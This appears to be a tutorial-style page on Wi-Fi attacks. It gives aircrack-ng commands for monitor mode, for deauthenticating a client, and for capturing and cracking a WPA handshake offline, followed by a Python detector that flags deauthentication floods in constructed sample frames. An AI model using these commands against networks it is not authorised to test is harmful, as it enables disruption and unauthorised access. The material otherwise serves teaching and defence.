Wireless Attacks

Aircrack

The aircrack-ng suite of tools handles every step of wireless network cracking. In short, the steps are:

  1. Monitor the local area for target BSSIDs

  2. Find target BSSID

  3. Monitor target BSSID and find target client MAC (optional)

  4. Deauthenticate client MAC

  5. Intercept client WPA handshake and crack offline

Monitoring and Locating Target

Put the adapter into monitor mode and kill interfering processes.

sudo airmon-ng check kill
sudo airmon-ng start wlan0

Start monitoring local wireless traffic.

sudo airodump-ng wlan0mon -w mycapturefile # 2.4 GHz band
sudo airodump-ng wlan0mon --band a -w mycapturefile # 5 GHz band

Start monitoring a single BSSID and list clients.

airodump-ng -c [CHANNEL] --bssid [BSSID] -w mycapturefile wlan0mon

Deauthentication Attack

After locating your target BSSID and client MAC, send deauthentication frame(s).

aireplay-ng -0 1 -a [BSSID] -c [CLIENT MAC] wlan0mon

By this point airodump-ng should have captured a WPA handshake (it writes the capture as mycapturefile-01.cap). Crack it offline.

aircrack-ng -w wordlist -b [BSSID] mycapturefile-01.cap
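From the defender's side, the deauthentication step above is detectable because deauth and disassociation frames are unencrypted management frames with fixed type/subtype values in the Frame Control field. The following Python detector is an added example, not part of the original page: it parses raw 802.11 headers (no radiotap header assumed), counts deauth/disassoc frames per BSSID and target, and flags a flood over constructed sample frames; the MAC addresses, reason codes and threshold are assumptions.

```python
import struct
from collections import Counter

# Frame Control byte 0: bits 0-1 version, bits 2-3 type, bits 4-7 subtype
TYPE_MGMT = 0
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
KICK_SUBTYPES = (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH)

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_frame(frame: bytes):
    """Parse a raw 802.11 frame; management header is 24 bytes
    (FC, duration, addr1=DA, addr2=SA, addr3=BSSID, seq). Returns None if too short."""
    if len(frame) < 24:
        return None
    ftype = (frame[0] >> 2) & 0x3
    subtype = (frame[0] >> 4) & 0xF
    reason = None
    if ftype == TYPE_MGMT and subtype in KICK_SUBTYPES and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]  # 2-byte little-endian reason code
    return {"type": ftype, "subtype": subtype, "dst": mac_str(frame[4:10]),
            "src": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22]), "reason": reason}

def detect_deauth_flood(frames, threshold=5):
    """Count deauth/disassoc frames per (bssid, target) and return pairs at or over threshold.
    A single frame is normal (a client leaving); a burst to one target is the attack signature."""
    counts = Counter()
    for raw in frames:
        f = parse_frame(raw)
        if f and f["type"] == TYPE_MGMT and f["subtype"] in KICK_SUBTYPES:
            counts[(f["bssid"], f["dst"])] += 1
    return {k: n for k, n in counts.items() if n >= threshold}

def build_mgmt(subtype, dst, src, bssid, body=b"") -> bytes:
    """Constructed test frame (not a real capture): 24-byte management header plus body."""
    fc = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0x00])
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body

# Constructed sample traffic: one beacon, a burst of 8 spoofed deauths
# "from the AP" to a client (reason 7), and one genuine client departure (reason 3).
AP = bytes.fromhex("02aabbccdd01")       # assumed BSSID
CLIENT = bytes.fromhex("02112233aa02")   # assumed client MAC
SAMPLE = [build_mgmt(SUBTYPE_BEACON, b"\xff" * 6, AP, AP)]
SAMPLE += [build_mgmt(SUBTYPE_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7)) for _ in range(8)]
SAMPLE += [build_mgmt(SUBTYPE_DEAUTH, AP, CLIENT, AP, struct.pack("<H", 3))]

if __name__ == "__main__":
    for (bssid, dst), n in detect_deauth_flood(SAMPLE).items():
        print(f"ALERT: {n} deauth/disassoc frames to {dst} on BSSID {bssid}")
```

With Protected Management Frames (802.11w) enabled, stations discard deauthentication frames that lack a valid integrity check, so the burst above is both logged and ineffective.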
